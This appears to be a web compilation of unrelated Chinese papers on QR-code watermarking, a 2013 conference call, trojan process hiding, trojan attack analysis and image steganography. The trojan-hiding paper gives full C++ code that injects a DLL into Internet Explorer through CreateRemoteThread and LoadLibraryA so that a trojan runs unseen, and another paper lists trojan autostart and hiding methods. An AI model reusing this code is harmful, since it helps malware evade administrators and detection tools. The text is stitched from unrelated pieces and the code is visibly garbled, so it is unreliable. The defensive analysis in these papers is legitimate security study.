[30] S. Cai, X.K. Shen. Octree-based robust watermarking for 3D model[J].Journal of Multimedia, 2011,6(1): 83-90.
[31] S. Cai, X.K. Shen. OTP-W:Octree partition-based 3D mesh watermarking[C].Second International Workshop on Education Technology and Computer Science,2010.
[32] 廖學良,王屏.一種新的三維模型水印嵌入空域算法[J]. 計算機學報,2008, 31(10): 1848-1856.
[33] K. Wang, G. Lavouéa, F. Denisb, A. Baskurt. Robust and blind mesh watermarking based on volume moments[J].Computers & Graphics,2011, 35(1): 1-19.
[34] I.L. Chung, C.M. Chou, D.C. Tseng. Hiding data in triangle meshes by rearranging representation order[J].International Journal of Innovative Computing, Information and Control,2011, 7(6): 3419-3435.
[35] 胡敏,劉輝.基于特征點的自適應三維網格數字水印算法[J].合肥工業大學學報(自然科學版),2010,33(1):55-59.
[36] M. Hachani, A.Z. Ouled, S. Bahroun. Wavelet based watermarking on 3D irregular meshes[C]. 19th IEEE International Conference on Image Processing(ICIP),2012.
[37] Y.P. Wang, S.M. Hu. Optimization approach for 3D model watermarking by linear binary programming[J].Computer Aided Geometric Design, 2010,27(5): 395-404.
[38]陳力為. 中文信息處理叢書序言[M].北京:清華大學出版社,2000.
[39]俞士汶,朱學鋒,賈玉祥. 漢語隱喻自動處理研究之概況[C].第四屆文學與信息技術國際研討會,2008.
[40] 譚良,吳波,劉震,等.一種基于混沌和小波變換的大容量音頻信息隱藏算法[J].電子學報,2010,38(8):1812-1819.
[41] 丁瑋,閆偉齊,齊東旭.基于置亂與融合的數字圖象隱藏技術及其應用[J].中國圖象圖形學報,2000,5(8):644-649.
[42] 田云凱,賈傳熒,王慶武.基于Arnold變換的圖像置亂及其恢復[J].大連海事大學學報:自然科學版,2006,32(4):107-109.
[43] 彭萬權,張承暢,馮文江,等.多階幻方卷積碼的構造及譯碼[J].電子學報,2013,41(1):123-130.
篇4
1.1 QR二維碼的應用背景
隨著中國3G技術的普及,以及手機本身性能的提高,二維碼作為一種全新的信息存儲、傳遞和識別技術迅速地融入到了社會生活當中,其保密和安全問題也越來越有研究價值,2012年鐵道部出現了用戶隱私資料信息被二維碼泄密的問題,病毒也開始通過二維碼傳播。目前國內針對二維碼數字加密的技術的論述并不多,在當前期刊網上有關二維碼討論的258篇論文也主要集中于二維碼自身的編碼解碼規則,只有16篇是討論二維碼數字手段加密的。其中加密采取的主要手段是通過復雜昂貴的隱形印刷技術。而討論數字加密的只是對一般圖像都通用的結合水印加密,未能很好的結合QR二維碼自身的編碼規則,所能負載的加密信息量也極少[3]。
1.2 國內外二維碼加密研究現狀
目前,國內外關于二維碼信息隱藏技術的文獻不是很多,研究對象主要是四一七條碼(Portable Data File417,PDF417碼)和QR碼。在國內,針對PDF417碼的研究較多且以空域水印為主,在國外,以研究QR碼居多,以頻域水印為主。牛夏牧[7]等利用變形技術對PDF417碼中的各組成單元寬度加以適量的變動,采用誤差累積的方式實現隱藏信息的嵌入和提取。陳崢等[3]針對PDF417碼,提出了基于邊界移位的隱藏信息嵌入算法。趙博等[4]提出一種基于結構微調法的水印算法,對PDF417碼的組成條空進行適量的微調,將信息隱藏進二維碼中。晁玉海等[5]提出一種對隱藏信息進行擴頻和映射處理,根據PDF417碼自身結構特點,通過微調條碼中的條和空將信息隱藏的方法。Ming Sun等[6]提出兩種基于離散小波變換(Discrete Wavelet Transform,DWT)變換的QR碼數字水印,分別可以嵌入隨機序列和圖片。Jau-Ji Shen等[7]針對PDF417碼提出一種稱作關聯水印的盲水印算法,該算法可以提高水印的嵌入容量并可將PDF417碼用于數據認證。
⑴二維碼圖和傳統防偽制作技術(主要是印刷)相結合,避免碼圖被直接影印、拍照,比如采用隱形印刷等等;
⑵掌握二維碼編碼技術,對二維碼碼圖本身做特殊處理(如加密、復合、變形等),這種方法的目的有二,一是可以讓別人的識讀軟件無法識別碼圖,二是可以在這些碼圖中編入特別信息,以作防偽校驗之用。
簡而言之,一個采用特殊印刷技術,一個采用特殊編碼,從而提高技術門檻也就提高了造假的成本與難度。本文研究算法基于第二種方式,對二維碼碼圖進行特殊處理,達到嵌入 信息進行防偽校驗目的。
2 適用于QR的數字水印算法
2.1 水印的嵌入算法
2.1.1 水印嵌入位置及表示方案
鏈碼和QR二維碼水印信息的位置選擇和像素值改變方案,根據鏈碼、改進的LSB算法和二維碼的基本理論,本文結合處如下表示方案。QR碼圖像是由N*N個深色或者淺色的模塊圖形組成,實驗中是黑色和白色模塊。考慮水印需要的隱蔽性,我們選取黑色的正方形作為水印嵌入單元。假設QR碼的一個模塊圖形的大小為M*M,其中M為模塊的長度(高度),單位是像素。條碼矩陣的大小為N*N。每個正方形基元占用的像素點為M/N。
如圖2.1所示:跟四鏈碼的結合方式為將正方形基元平分成四等份,每一塊的大小為M/2N,選擇其中的一塊,按統一水印規則改變整個選中塊的像素值,嵌入水印信息,按照鏈碼方向的規則給四個方向的小矩陣編碼為0,1,2,3,四幅圖中的紅色區域分別對應著0,1,2,3。這樣每個黑色QR碼的正方形基元便可以承載一位四進制的數。當圖像格式為RGB三色圖時,結合第一章所介紹的改進的LSB編碼規則,每一塊像素值按規則改變后又可表示為00,01,10,11的四進制,跟位置的編碼規則相結合,每個正方形模塊就可以表示一位十六進制的數,也就是4bit的信息。
2.1.2 水.印嵌入流程
如圖2.2 水印算法的整體嵌入步驟:
第一步:根據基本信息編碼出未加密的二維碼舉證,自左向右,自上而下,統計N*N黑色和白色模塊的QR二維碼可用來嵌入水印的黑色模塊的個數,記為C,并記錄下各個可用的黑色模塊在二維碼的二維矩陣中的位置。
第二步:依據偽指紋特征隨機密鑰生成技術,隨機生成三個指紋特征數據記為T1、T2、T3,并將T1、T2、T3轉碼成和水印嵌入方式所采用的編碼進制(八進制、十六進制等)相同的編碼進制,統計出T1,T2,T3所需要的占用編碼位數記為n1,n2,n3。
第三步:如果n1+n2+n3>c,則說明水印嵌入位置不足以嵌入所有的指紋特征數據,當嵌入位置不足時采用基于模擬退火算法競爭機制,解決各個特征信息之間采樣數競爭問題,模擬退火的優勢能保證了嵌入位置的隨機性,和各個特征信息的均衡性。
第四步:依照模擬退火算法競爭機制產生的二維指紋矩陣加密位置對應表,對QR二維碼圖形進行加密。
2.2 水印的提取算法
如圖2.3:首先,從加密的二維碼圖片中解碼出二維碼的基本信息。
將加密后的二維碼圖片記為map1和未水印加密的二維圖片記為map2,導入解碼程序中。
第二步:將相應的兩幅圖像做減法代數運算,提取圖像中目標區域,給定閾值大小為水印差值的一半,將低于閾值的像素點看作相同像素點,差值取絕對值選取為了實現精確定位,因為兩幅圖像編碼格式一致,除了不通目標區域以外,其他區域完全相同,包括圖像大小等。
第三部:使用數學形態學方法,實現斷線的連接,主要目的是保持目標區域邊緣連續,為孤立點的去除做準備。第三步:使用改進中值濾波去除圖像中孤立異常點,如果除了目標區域以外,其他區域完全相同,那么基本不需要去處異常點,在做加入噪聲干擾實驗時去除邊緣毛邊是一個需要除了的問題。
第四步:采用曲線全向跟蹤技術,尋找目標區域的邊緣輪廓,探查到所有目標區域邊緣。
第五步:將圖像按照二維碼自身的編碼規則分成N*N塊,根據上圖中提取去的各個嵌入水印的矩形區域的位置,并將區域大小經過閾值判斷,去掉干擾點,定位出各個區域對應得編碼值,返回二維矩陣各個嵌入水印值位置對應得值。和加密時候保存的加密二維矩陣值進行對比,進行水印驗證。
3 實驗
含有水印的QR碼的識別和提取實驗
算法穩定性實驗,流程如下:
(1)產生一段隨機長度和隨機內容的文本T1。
(2)將文本T1編碼為QR碼圖形Q1。
(3)計算Q1的水印容量大小。
(4)通過通過隨機指紋發生器和模擬退火競爭機制產生水印信息W。
(5)向Q1中嵌入水印信息W得到含有水印的QR碼圖形Q2。
(6)識讀Q2得到T2,并與原始編碼內容T1對比,記錄對比結果。
(7)從含有水印的QR碼圖形Q2中提取水印信息WR。
(8)比較W和WR,記錄對比結果。
(9)重復1000次步驟(1)~(8)的試驗,并計算QR碼的識別正確率和水印嵌入和提取的正確率。
隨機文本T包含英文字母、數字和常用標點符號。重復試驗的次數為100次,最后記錄實驗結果并計算正確率。實驗最終得到的數據是QR碼的識別正確率為97%,嵌入和提取水印的正確率為95%。該實驗表明,水印算法非常穩定,嵌入的水印不會影響到QR碼的正確識別,并且水印信息的嵌入和提取不受水印內容和QR碼載體圖像的影響。
4 結論
提出了一種適用于QR碼的魯棒性和嵌入信息量都適中的水印算法,該算法用鏈碼的方向編碼和改進的LSB算法嵌入水印信息,保證水印信息不會改變QR碼的圖形結構,并確保嵌入的水印信息不會影響到QR碼的正確識別。與現有的利用誤差特性進行信息隱藏的算法相比,該算法極大程度增強了數字水印的隱蔽性,提高了水印信息的嵌入量。同時算法不會受到QR碼的容量限制,并且適合電子保存和打印等多種形式,具有提取水印速度快,抗干擾能力強等優勢。并且提出了由多種生物特征提取出的信息組成水印信息的方式,將二維碼與用戶綁定,實現了人碼一體的認證功能。
[參考文獻]
[l]何葉.基于二維條碼的數字水印技術研究.長沙理工大學碩士學位論文.(2009).
[2]趙博.二維條碼研究.西安電子科技大學碩士學位論文.(2007).
[3]紀興中.基于二維條碼技術的數字水印系統研究.浙江工業大學碩士學位論文.(2007).
[4]陳哲,張永林.數字水印技術在二維條碼證件防偽中的應用.計算機工程與科學.28(4).42-44.(2006).
篇5
作者提交的論文,必須是未經發表或未并行地提交給其他學術會議或學報的原始論文。所有提交的論文都必須是匿名的,沒有作者名字、單位名稱、致謝或其他明顯透露身份的內容。論文必須用英文,并以 PDF 或 PS 格式以電子方式提交。排版的字體大小為11pt,并且論文不能超過12頁(A4紙)。所有提交的論文必須在無附錄的情形下是可理解的,因為不要求程序委員閱讀論文的附錄。如果提交的論文未遵守上述投稿須知,論文作者將自己承擔論文未通過形式審查而拒絕接受論文的風險。審稿將由3位程序委員匿名評審,評審結果為:以論文形式接受;以短文形式接受;拒絕接受。
ICICS2013會議論文集可在會議其間獲取。凡接受論文的作者中,至少有1位必須參加會議,并在會議上報告論文成果。
投稿截止時間:2013年6月5日 通知接受時間:2013年7月24日 發表稿提交截止時間:2013年8月14日
會議主席:林東岱 中國科學院信息工程研究所 研究員
程序委員會主席:卿斯漢 中國科學院軟件研究所、北京大學軟件與微電子學院 教授
Jianying ZHOU博士 Institute for Infocomm Research,新加坡
篇6
木馬程序(也稱后門程序)是能被控制的運行在遠程主機上的程序,由于木馬程序是運行在遠程主機上,所以進程的隱藏無疑是大家關心的焦點。
本文分析了WindowsNT/2000系統下進程隱藏的基本技術和方法,并著重討論運用線程嫁接技術如何實現WindowsNT/2000系統中進程的隱藏。
1基本原理
在WIN95/98中,只需要將進程注冊為系統服務就能夠從進程查看器中隱形,可是這一切在WindowsNT/2000中卻完全不同,無論木馬從端口、啟動文件上如何巧妙地隱藏自己,始終都不能躲過WindowsNT/2000的任務管理器,WindowsNT/2000的任務管理器均能輕松顯示出木馬進程,難道在WindowsNT/2000下木馬真的再也無法隱藏自己的進程了?我們知道,在WINDOWS系統下,可執行文件主要是Exe和Com文件,這兩種文件在運行時都有一個共同點,會生成一個獨立的進程,尋找特定進程是我們發現木馬的方法之一,隨著入侵檢測軟件的不斷發展,關聯進程和SOCKET已經成為流行的技術,假設一個木馬在運行時被檢測軟件同時查出端口和進程,我們基本上認為這個木馬的隱藏已經完全失敗。在WindowsNT/2000下正常情況用戶進程對于系統管理員來說都是可見的,要想做到木馬的進程隱藏,有兩個辦法,第一是讓系統管理員看不見你的進程;第二是不使用進程。本文以第二種方法為例加以討論,其基本原理是將自已的木馬以線程方式嫁接于遠程進程之中,遠程進程則是合法的用戶程序,這樣用戶管理者看到的只是合法進程,而無法發現木馬線程的存在,從而達到隱藏的目的。
2實現方法
為了弄清實現方法,我們必須首先了解Windows系統的另一種"可執行文件"----DLL,DLL是DynamicLinkLibrary(動態鏈接庫)的縮寫,DLL文件是Windows的基礎,因為所有的API函數都是在DLL中實現的。DLL文件沒有程序邏輯,是由多個功能函數構成,它并不能獨立運行,一般都是由進程加載并調用的。因為DLL文件不能獨立運行,所以在進程列表中并不會出現DLL,假設我們編寫了一個木馬DLL,并且通過別的進程來運行它,那么無論是入侵檢測軟件還是進程列表中,都只會出現那個進程而并不會出現木馬DLL,如果那個進程是可信進程,(例如瀏覽器程序IEXPLORE.EXE,沒人會懷疑它是木馬吧?)那么我們編寫的DLL作為那個進程的一部分,也將成為被信賴的一員,也就達到了隱藏的目的。
運行DLL方法有多種,但其中最隱蔽的方法是采用動態嵌入技術,動態嵌入技術指的是將自己的代碼嵌入正在運行的進程中的技術。理論上來說,在Windows中的每個進程都有自己的私有內存空間,別的進程是不允許對這個私有空間進行操作的,但是實際上,我們仍然可以利用種種方法進入并操作進程的私有內存。動態嵌入技術有多種如:窗口Hook、掛接API、遠程線程等,這里介紹一下遠程線程技術,它只要有基本的進線程和動態鏈接庫的知識就可以很輕松地完成動態嵌入。
遠程線程技術指的是通過在另一個進程中創建遠程線程的方法進入那個進程的內存地址空間。我們知道,在進程中,可以通過CreateThread函數創建線程,被創建的新線程與主線程(就是進程啟動時被同時自動建立的那個線程)共享地址空間以及其他的資源。但是很少有人知道,通過CreateRemoteThread也同樣可以在另一個進程內創建新線程,被創建的遠程線程同樣可以共享遠程進程(是遠程進程)的地址空間,所以,實際上,我們通過一個遠程線程,進入了遠程進程的內存地址空間,也就擁有了那個遠程進程相當的權限。
3實施步驟
1)用Process32Next()函數找到宿主進程,獲取宿主進程ID,并用
OpenProcess()函數打開宿主進程。
2)用VirtualAllocEx()函數分配遠程進程地址空間中的
內存。
3)用WriteProcessMemory()函數將待隱藏的DLL的路徑名。
4)拷貝到步驟二已經分配的內存中。
5)用GetProcAddress()函數獲取LoadlibraryA()函數的實地址(在kernel32.dll中)。
6)用CreateRemoteThread()函數在遠程進程中創建一個線程。
7)它調用正確的LoadlibraryA()函數。
8)為它傳遞步驟二中分配的內存地址。
4具體實例
下面是在C++Builder4.0環境下編寫的運用遠程線程技術隱藏木馬的程序代碼:
#include<vcl.h>
#include<windows.h>
#include<stdio.h>
#include<tlhelp32.h>//該頭文件包涵了進程操作的API函數
#pragmahdrstop
#include"Unit1.h"
#pragmapackage(smart_init)
#pragmaresource"*.dfm"
InsistingpszLibFileName;//存放待隱藏的DLL文件名
HANDLEhProcessSnap=NULL;//進程快照句柄
HANDLEhRemoteProcess;//遠程進程句柄
LPVOIDpszLibFileRemote;//遠程進程中分配給文件名的空間
HMODULEphmd;//存放kernel32.dll句柄
HANDLEhRemoteThread1=NULL;//存放遠程線程句柄
TForm1*Form1;
//---------------------------------------------------------
__fastcallTForm1::TForm1(TComponent*Owner)
:TForm(Owner)
{
}
//---------------------------------------------------------
void__fastcallTForm1::Button1Click(TObject*Sender
{
PROCESSENTRY32pe32={0};
DWORDdwRemoteProcessId;
hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//打開進程快照
if(hProcessSnap==(HANDLE)-1)
{
MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);
exit(0);
}//失敗返回
pe32.dwSize=sizeof(PROCESSENTRY32);
if(Process32Fi
rst(hProcessSnap,&pe32))//獲取第一個進程
{
do{
AnsiStringte;
te=pe32.szExeFile;
if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))
//找到宿主進程,以IEXPLORE.EXE為例
{dwRemoteProcessId=pe32.th32ProcessID;
break;
}
}
while(Process32Next(hProcessSnap,&pe32));//獲取下一個進程
}
else
{
MessageBox(NULL,"取第一個進程失敗","",MB_OK);
exit(0);
}
hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM
_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
//打開遠程進程
pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";
//假設hide.dll是待隱藏的進程
intcb=(1+pszLibFileName.Length())*sizeof(char);//計算dll文件名長度
pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,
MEM_COMMIT,PAGE_READWRITE);
//申請存放文件名的空間
BOOLReturnCode=WriteProcessMemory(hRemoteProcess,
pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);
//把dll文件名寫入申請的空間
phmd=GetModuleHandle("kernel32.dll");
LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)
GetProcAddress(phmd,"LoadLibraryA");
//獲取動態鏈接庫函數地址
hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,
pfnStartAddr,pszLibFileRemote,0,NULL);
//創建遠程線
if(hRemoteThread1!=NULL)
CloseHandle(hRemoteThread1);//關閉遠程線程
if(hProcessSnap!=NULL)
CloseHandle(hProcessSnap);//關閉進程快照
}
該程序編譯后命名為RmtDll.exe,運行時點擊界面上的按鈕即可。
至此,遠程嵌入順利完成,為了試驗我們的hide.dll是不是已經正常地在遠程線程運行,我同樣在C++Builder4.0環境下編寫并編譯了下面的hide.dll作為測試:
nclude<vcl.h>
#include<windows.h>
#pragmahdrstop
#pragmaargsused
BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)
{
charszProcessId[64];
switch(reason)
{
caseDLL_PROCESS_ATTACH:
{//獲取當前進程ID
itoa(GetCurrentProcessId(),szProcessId,10);
MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);
break;
}
default:
}
returnTRUE;
}
當使用RmtDll.exe程序將這個hide.dll嵌入IEXPLORE.EXE進程后假設PID=1208),該測試DLL彈出了1208字樣的確認框,同時使用PS工具
也能看到:
ProcessID:1208
C:\WINNT\IEXPLORE.EXE(0x00400000)
……
C:\WINNT\hide.dll(0x100000000)
……
這證明hide.dll已經在IEXPLORE.EXE進程內正確地運行了。上面程序的頭文件由編譯器自動生成,未作改動,故略之。
5結束語
進程隱藏技術和方法有很多,而且這一技術發展也相當快,本文僅從一個側面加以討論,希望通過這一探討讓我們對進程隱藏技術有一個更清楚的認識,同時也為我們防范他人利用進程隱藏手段非法入侵提供參考,本文拋磚引玉,不當之處誠懇批評指正。
篇7
Trojan Attack Analysis and Response
Tang Yi
(Suzhou University of Science and Technology,Suzhou215009,China)
Abstract:This paper analyzes Trojan horse attacks,Trojan horse attacks are described details the main technology,and then launched a discussion of their responses,given the idea of testing procedures.
Keywords:Network monitoring;Network attacks;Communication hidden;Firewall
一、引言
據公安部一份調查報道顯示,我國近幾年的計算機用戶感染病毒、木馬的比例連續多年都在80%以上。特洛伊木馬(Trojan horse,簡稱木馬)來源于古希臘神話,Dan Edwards將這一名稱引入計算機領域。木馬和病毒、蠕蟲之類的惡意程序一樣,具有很大的危險與破壞性。能夠刪除或修改文件、上傳和下載文件、盜用客戶信息等。這些年伴隨著木馬在通信隱藏、程序隱藏等方面的不斷發展,對付其越來越具有了難度。本文針對木馬及其一般攻擊的方式進行分析,并且探討應對措施。
二、典型的木馬攻擊方式
木馬的攻擊方式,在本文主要是知其如何地進行感染與滲透,并且進行自身的隱藏,以及進行資料的搜集或者破壞等活動。木馬其攻擊過程的一個典型過程如下:當服務器端在目標計算機上被執行后,這時木馬程序開啟默認的端口從而實現監聽,而在客戶機給服務器的程序發出鏈接請求要求時,就進行響應:有關程序開始運行實現對答客戶機的應答,這樣就建立了服務器端程序跟客戶端之間的連接。建立鏈接以后,指令從客戶端來發出,而服務器中則進行指令的分析與執行,并將數據傳送到客戶端,以達到控制主機的目的。
三、木馬攻擊方式重要技術分析
(一)目標的感染與植入
向目標主機成功植入木馬是木馬成功運行、發揮作用的前提。這一過程通常包含偽裝、捆綁、漏洞利用等一切可能利用的技術手段。這個過程主要有:1.腳本種植技術。利用網頁木馬,網頁木馬就是當用戶瀏覽某網頁時,自動下載并運行某“木馬”程序。2.利用腳本方式植入。通過ScriPt、Activex及AsP、cGI交互腳本的方式植入。3.利用系統漏洞植入。利用系統的其他一些漏洞進行植入。4.遠程安裝。通過一定的方法把木馬執行文件傳送到目標主機的電腦里再進行遠程安裝。
(二)自動加載
在自動加載過程,本身也是一個隱藏著的行為。這需要在操作系統啟動的時候同步地啟動自身,以此達到讓木馬在宿主機中自動運行的目的。常見的木馬啟動方式有:啟動項加入注冊表;win.ini和System.ini中的load節中添加啟動項;Autoexe.bat中添加;修改Boot.ini的配置;修改Explorer.exe參數等等。
(三)進程隱藏以及文件隱藏
早期的木馬進程的隱藏采取的措施比較簡單,Windows9x系統要實現進程的隱藏可以通過把木馬程序注冊為服務的方式來達到。在Windows Nt/2000下,有些進程名字改得和系統進程非常相似,迷惑使用的人;也有的利用HOOK API技術修改函數的入口點欺騙列舉本地進程的api函數;當然更好的是使用Rundll32.exe設計技術運行木馬本身,這樣在進程列表中顯示出來的就是Rundll而非木馬的可執行文件名,文件管理器中不能正確地列出木馬的可執行文件。除了進程隱藏,還需要對靜態文件的隱藏于保密,這里不贅述了。
總而言之,各懷鬼胎的木馬通過以上隱秘的方式,實現了對計算機的攻擊。
四、木馬防范及應對
(一)意識層面
提高警惕,養成良好的習慣。時刻關注電腦運行的情況,當出現異常情況時如:系統自行運行文件、系統變慢、網絡流量異常等,要提高警惕,查殺系統。養成良好的上網習慣,不要上一些有問題的網站,不要隨意下載免費軟件,不要隨意打開郵件附件。
(二)技術層面
1.系統漏洞補丁的更新,及時為系統打上最新補丁。2.利用一些專殺工具。由于木馬專殺工具往往對特點木馬有非常好的效果,可以考慮周期性的進行應用。3.使用防火墻或者系統自帶的功能如IP安全策略、端口篩選等,關閉系統特定端口,以阻斷木馬服務端與控制端的連接。
五、木馬檢測程序設計思路
對于一般使用者,可以積極采用4中所述的方法進行應對。對于更加專業的人員,可以根據木馬的特點開發應對木馬的工具。目前主要的木馬檢測方法都是對被人們已經發現的木馬程序在在植入系統過程中及在系統中運行時的這些靜態特征進行分析,提取出這些靜態特征,構建木馬的靜態特征庫,從而進行靜態特征檢測。但是這種方法強烈依賴于對木馬的各種隱蔽和變化特征的深刻了解,所以檢測能力不足,對未知的木馬更是無能為力、有根本性的缺陷,更好的方法是應用對動態行為監測之方法。考慮到木馬行為的隱蔽性和目的的惡意性,從這兩點區別入手,用動態的方法控制木馬植入、隱蔽和惡意操作行為所需要的資源條件,監控木馬運行、通信、啟動的隱蔽行為和惡意操作,對木馬進行檢測和防范。當然,也可以從動靜兩方面結合來進行木馬的監測與阻隔。
這些行為的實施,更加有賴于對木馬攻擊方式的了解,要看到木馬技術一直處于發展與升級的過程中,所以應對它也決不能喪失警惕,需要不斷發現其攻擊方式的新技術、新特征,從而提出更好的應對方法。
參考文獻:
[1]周宗元,孔健行,武克南.線程插入技術的研究與防范[J].電腦知識與技術(學術交流),2007,17
篇8
1 信息隱藏技術與傳統加密技術
信息隱藏是把秘密信息隱藏到載體信息中,而在感官上不改變載體本身,實質上因為隱藏了秘密信息,雖然載體信息本身也做了修改,但人類感覺器官的具有不敏感性,而且數字多媒體信號本身具有冗余性,這使得加載了秘密信息后的信息與原有的載體信息在感官上沒有明顯區別,載密后的信息的使用價值也不改變。
信息隱藏技術與傳統加密技術的目的都是為了保護秘密信息,但二者還是有一定區別。最主要的區別是信息隱藏技術對載體信號的改變在人的感官層面不容易被發現,可以將秘密信息隱藏于人人可見的載體中,而傳統加密技術對秘密信息加密后產生的多數是沒有意義的信息,容易被發現,從而有針對性的破解。換言之,通過信息隱藏技術載密后,信息在感官上沒有明顯變化,除了秘密發送和接收方可以訪問載密信息。與加密技術結合使用稱為有密鑰信息隱藏,即在嵌入秘密信息前,先將秘密信息進行加密處理,同時生成一個密鑰。在提取秘密信息時,擁有權限者先得到的是加密的秘密信息,要用發送方提供的正確的密鑰,還原加密的秘密信息為明文。
信息隱藏技術主要有隱寫術、數字水印技術、可視密碼技術、潛信道、隱匿協議等方法;在具體應用中按載體信號的不同分為基于文本、基于數字圖像、基于音頻、基于視頻等。
2 信息隱寫與數字水印
隱寫術是指把隱秘信息嵌入到宿主信息中來進行傳輸,并保證隱秘信息不被未授權的第三方發現。因此,隱寫術要求大容量嵌入與較高的隱蔽性。
數字水印是基于版權保護的應用而產生的,指嵌入在數字產品中的信息。數字水印與隱寫術的區別在于其應用的目的不同,隱寫術的目的在于隱藏信息,而數字水印的目的在于版權保護,因此水印的魯棒性要求較高,但嵌入容量要求較小。
3 信息隱寫算法的評價
在評價信息隱藏算法時,根據信息隱藏的不同應用場合,有如下技術性能的要求:(1)不可檢測性,指的是載密信號與原始信號具有相同的特點,不容易被檢測出來。(2)不可感知性,指載密后的信息外觀形態不因為嵌入的秘密信息而發生明顯的感官變化,不易被發現是載有秘密的信息。(3)安全性,是指隱藏算法要有抗攻擊能力,非授權用戶即使知道該信息為載密信息而對其進行攻擊,也不能破壞原有信息和提取出秘密信息。(4)魯棒性,是對載密信號在傳輸過程中受到一些正常操作,載體中的隱藏信息的具有承受能力,不易損。(5)對稱性,是指信息隱藏中秘密信息的嵌入和提取過程是互逆的,也就是嵌入秘密信息和提取秘密信息可以使用同一算法。(6)自恢復性,在信息傳遞過程中,某些操作或者變換會對載密信息造成較大的破壞。這時為了保證信息的可用,可根據破壞后留下的數據片段,恢復出秘密信息,即自恢復性。
在信息隱藏算法開發和研究過程中,人們希望可以滿足以上所有的要求,但是在實際情況下,因為有些特性是互斥的,很難同時滿足所有特性,可以根據實際應用場合及媒體特點側重某些方面。通常來說,嵌入秘密信息的信息容量與算法的不可感知性和魯棒性成反比,也就是說隱藏的信息量越大,載密后信息的越容易被發現和被損壞。
隱寫術作為信息隱藏的一種應用,我們主要關注的性能參數是隱藏質量和隱藏容量。隱藏質量,是載密后對人類感官的影響程度。由于人類個體的差異,在判斷同一個目標時,會有不同的評價,所以不能有效地評價含密載體與原始載體的差別大小。為了使評價更容易量化,不因為個體差異而無法準確形容和評價載密前后的差異,引入一個國際通用的評價標準峰值信噪比PSNR。PSNR是指最大可能功率和影響它的表示精度的破壞性噪聲功率的比值。在隱寫中用來評價載密前后信息的相似程度。秘密信息通過某個隱寫算法嵌入到原始載體后,如果載密后圖像與其原始載體之間的PNSR值越大,說明該算法的隱藏質量越好。但是PSNR的分數和人眼看到的視覺品質也不是完全一致,有可能PSNR較高者看起來的效果反而不如PSNR較低者。隱藏容量也叫做隱藏載荷ER,表示所嵌入的秘密信息位占整個載體圖像像素點的百分比。多數算法都希望載體圖像能夠攜帶更多的信息,即有較大的隱藏容量,但隱藏容量和隱藏質量往往相互制約,當隱藏的信息容量變化時,質量也會隨之變化。
4 隱寫術工作原理及相關算法
在對信息隱寫算法優化時主要通過兩個方面的實現。一是通過人的感官特性,人眼對圖像的視覺分成敏感的平滑區和遲鈍的邊緣區,對于平滑去減少隱藏容量,對于邊緣區加大隱藏容量;二是圖像也可以分區,稱之為分塊,對于不同特性的分塊可以采用不同的嵌入算法。
主流的隱寫算法是空域算法中的最低有效位LSB算法。該算法基本思想是將秘密信息嵌入到載體圖像像素值的最不顯著位也即最低有效位,從而達到隱藏秘密信息的目的,因為是最不顯著位,所以改變這一位置對宿主圖像的感官效果不產生影響。LSB的基本步驟是:把秘密信息轉換為二進制數據,將秘密二進制數據與像素最低有效位對比,若相同,保留信息,否則將載體像素的最低有效位用最低秘密信息直接替換,就得到了載密二進制信息,最后將該二進制數據轉換為十進制像素值,也就是含有秘密信息的圖像。最小有效位算法容易實現,而且嵌入信息容量大,是當前各種衍生算法的根本核心。
本文在這里介紹一種基于JPEG圖像的分塊隱寫算法。首先把秘密信息轉化為二進制信息,將圖像分成8*8的分塊,根據量化后的離散余弦變換系數DCT,計算分塊的不為零的交流系數個數。根據隱藏的容量的大小,確定閾值。根據閾值將圖像塊分成人眼敏感程度不同的三種類型,不同類型的分塊采取不同的隱藏算法嵌入數據。人眼不敏感的子塊,嵌入較大量信息,仍然可以保持較好的隱藏質量,反之人眼較敏感的分塊,為了保證隱藏質量,嵌入較小量信息。在進行秘密信息提取時,分塊提取也就是嵌入過程的逆過程,再把所有分塊中提取的秘密信息合成原有秘密信息。通過實驗數據表明,該算法有效地平衡了隱藏質量和隱藏容量之間的關系,同時避免了方塊效應,從而在隱藏質量得到保證的前提下大幅提高了隱藏容量。
通過數字隱寫完成秘密通信分為嵌入過程、傳輸過程和提取過程三個階段。密秘信息通過特定嵌入算法隱藏到原始載體中(也可以將秘密信息用傳統方法結合秘鑰加密后嵌入),形成含密載體,通過傳輸信道將含密載體發送出去。接收方通過隱寫檢測區分是否為含密載體,若是,再結合密鑰對含密載體使用提取算法,提取出秘密信息。
5 結束語
信息隱寫技術現在已經成為了信息安全的一個熱點,廣泛應用于各國軍事部門、安全部門的信息加密及情報傳輸等方面。目前數字圖像信息隱藏技術已經比較完善和成熟,但音頻和視頻作為網絡上新興和主流的數字媒體,是信息隱藏技術更廣闊的載體領域,而且人的視覺和聽覺也有不敏感性,所以基于音頻和視頻的隱寫算法研究也將是今后信息隱寫技術的工作重點。
參考文獻:
[1]江小帆,戴躍偉,茅耀斌.信息隱藏技術-方法與應用[M].北京:機械工業出版社,2001.
[2]Cheng-Hsing Yang.Inverted pattern approach to improve image quality of information hiding by LSBsubstitution.Pattern Recognition,Volume 41,Issue 8,August 2008,Pages 2674-2683.
[3]徐凱平,鄭洪源,丁秋林.一種基于LSB和PVD的圖像信息隱藏算法研究[J].計算機應用研究,2010,27(3):1068-1070.
篇9
